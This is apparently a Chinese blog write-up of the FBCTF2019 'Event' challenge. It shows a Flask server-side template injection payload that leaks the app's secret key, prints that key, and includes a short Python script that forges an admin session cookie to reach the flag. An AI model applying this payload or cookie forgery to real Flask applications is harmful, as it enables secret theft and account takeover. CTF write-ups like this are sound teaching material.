# [FBCTF2019]Event

# 4

进入是这样的

直接注册 / 登录:

5

F12 发现有个 event_important 参数:用__dict___发现有回显,为 ssti

发现有可疑的 session user,可能在环境变量里面有密钥:

直接:

__class__.__init__.__globals__[app].config

1

密钥:

fb+wwn!n1yo+9c(9s6!_3o#nqm&&_ej$tez)$_ik36n8d7o6mr#y

有密钥后:

from flask import Flask
from flask.sessions import SecureCookieSessionInterface
app = Flask(__name__)
app.secret_key = b'fb+wwn!n1yo+9c(9s6!_3o#nqm&&_ej$tez)$_ik36n8d7o6mr#y'
session_serializer = SecureCookieSessionInterface().get_signing_serializer(app)
@app.route('/')
def index():
    print(session_serializer.dumps("admin"))
index()

2

修改 user 的 cookie 值:

6

访问 /flag:出了

Edited on

Give me a cup of [coffee]~( ̄▽ ̄)~*

odiws WeChat Pay

WeChat Pay

odiws Alipay

Alipay

odiws PayPal

PayPal